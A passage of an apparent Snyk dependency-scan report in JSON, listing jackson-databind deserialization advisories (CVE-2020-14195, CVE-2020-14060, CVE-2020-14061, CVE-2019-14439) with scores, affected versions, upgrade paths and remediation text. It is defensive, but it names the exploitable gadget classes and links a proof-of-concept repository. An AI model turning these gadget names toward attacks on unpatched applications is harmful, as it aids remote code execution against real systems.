"2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.5)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2765", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.781685Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.570033Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:46.171514Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.781685Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.570033Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.jsecurity.realm.jndi.JndiRealmFactory`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2765)\n", - "epssDetails": { - "percentile": "0.91500", - "probability": "0.03413", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14195" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mc6h-4qgp-37qh" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-06-14T14:48:40.820120Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.5)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-14T14:45:09Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-06-14T15:32:14Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.570033Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Topsec" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2688", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:42.075545Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.574354Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:40.405517Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:42.075545Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.574354Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `oadd.org.apache.xalan.lib.sql.JNDIConnectionPool` (`apache/drill`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2688)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.94931", - "probability": "0.10105", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14060" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-j823-4qch-3rgm" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-06-15T10:29:46.691157Z", - "functions_new": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-15T10:23:33Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-06-15T15:46:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.574354Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2698", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.681468Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.565244Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.989304Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.681468Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.565244Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using any of the following class gadget available within `weblogic/oracle-aqjms` if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\n* oracle.jms.AQjmsQueueConnectionFactory\r\n* oracle.jms.AQjmsXATopicConnectionFactory\r\n* oracle.jms.AQjmsTopicConnectionFactory\r\n* oracle.jms.AQjmsXAQueueConnectionFactory\r\n* oracle.jms.AQjmsXAConnectionFactory\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2698)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.91508", - "probability": "0.03404", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14061" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-c2q3-4qrh-fm48" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-06-15T11:03:46.232208Z", - "functions_new": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-15T10:59:39Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-06-15T15:45:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.565244Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.9.2", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", - "title": "GitHub Comparison" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2387", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2389", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2395", - "title": "GitHub Issue" - }, - { - "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", - "title": "Snyk Blog" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:46.065762Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:35.581531Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.009523Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:46.065762Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:35.581531Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14379](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", - "epssDetails": { - "percentile": "0.45827", - "probability": "0.00116", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14439" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6fpp-rgj9-8rwc", - "GHSA-gwp4-hfv6-p7hw" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2023-11-14T13:41:26.478840Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2019-07-29T12:40:42Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-07-29T12:40:42Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:35.581531Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.7.9.6" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.6)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.9.10.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.9.4,2.9.10.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", - "className": "SubTypeValidator", - "functionName": "validateSubType" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2814", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Kamimuka/cve-2020-24616-poc", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:13.383929Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:47.311633Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:03.282990Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:13.383929Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": 